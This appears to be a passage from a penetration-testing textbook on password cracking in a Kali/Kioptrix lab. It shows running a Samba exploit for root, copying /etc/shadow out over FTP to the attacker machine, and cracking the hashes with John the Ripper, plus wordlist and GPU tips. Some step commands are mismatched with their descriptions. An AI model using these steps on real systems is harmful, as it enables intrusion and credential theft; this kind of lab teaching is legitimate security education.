In this day and age, one would assume that all systems use multifactor authentication. Unfortunately, that is not the case. Even so-called "secured networks" still use protocols that are sending out clear text passwords, systems are using insecure encryption protocols, and more. One basic skill (basic as in chess: easy to learn and difficult to master) that every pentester should attempt to master is the art of password cracking. We will start off with a few simple examples to solidify the concept and then move on to some of the strategies used by the very best in the field.
Passwords are often reused by busy users and even administrators. Regardless of how important a system is on the network, once you gain access to the password hashes they should immediately be cracked and added to any dictionary file you have in place. This could potentially save a lot of time.
First, we need to pull some files from the victim machine. Start up your Kali and Kioptrix Level 1 guest machines, run the exploit you previously compiled, and pull the passwd file down so that we can run John against it.
- Start all necessary virtual devices in your lab (Kali and Kioptrix).
- Run
./SambaVuln10 –b 0 192.168.75.14. - You are now connected as root on
kioptrix.level1. - Open a new terminal session and start
pure-ftpdon your Kali guest machine. - In the shell that is connected to the Kioptrix machine, use FTP to connect to your FTP server on the Kali machine:
cd /etc - Move to the
/etcdirectory. Remember that you will not receive much feedback from the victim machine:ls - You should see a directory listing of the Kioptrix
/etcdirectory:ftp 192.168.75.12 - Type in the user name we created on the FTP server on the Kali machine:
(
ftplogin) Password: password - Enter the password for the FTP server account. Wait a moment or two and type:
put shadow - Wait a few more moments and type:
ls exit
You should see a directory listing of the target FTP site.
- CTRL + Q will get you out of the Kioptrix machine.
Now that we have the shadow file on our Kali machine, let's see what we can do with it.
We can launch john against our Kioptrix shadow file:
# john /var/public/shadow
John will start to attempt to brute-force the MD5 passwords.
Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [32/64 X2])
Tip
If you are lucky or extremely patient, you will be rewarded with the unencrypted passwords for the target machine. Depending on the password complexity used combined with the speed of your system, this step could take anywhere from minutes to weeks to complete. There are third-party services available that can be used to crack passwords but using these would have to be specifically permitted within your rules of engagement as you lose control of any data sent to a third party.
Brute-forcing is still a very viable method of gaining access to a machine. The problem with passwords is that people have to be able to recall them at will. Trying to remember 233!sdsfF_DaswsaWlsc!!&$#_ would be difficult for most and thus we end up with a short list of commonly used passwords such as ILoveLore1!. The problem with this is that there are several methods of narrowing down the list of possible passwords, and that computers currently have as many as eight processor cores for a home desktop.
Tip
Password cracking can be accomplished using multiple video cards and their GPUs. This is the preferred method if the resources are available. At the time of writing, the team at hashcat had the fastest password cracker at 8 million attempts per second. You can find more here http://hashcat.net/oclhashcat/.
Although the password ILoveLore1! would meet numerous enforced password policies, you could easily make a list of passwords that appends certain commonly used characters such as !, 1, 2, and so on. If you are clever about how you are creating your word lists, placing commonly used terms such as ILove, Iam, and so on would make the rest simple. Modern password brute forcing techniques would tear this password up in mere moments. This makes cracking passwords faster and easier than ever.
Be aware that many of the examples used in this book are simplified to make the concepts easier to learn. Once you understand the concepts, you will be able to use the very same techniques when performing on real-life networks as well.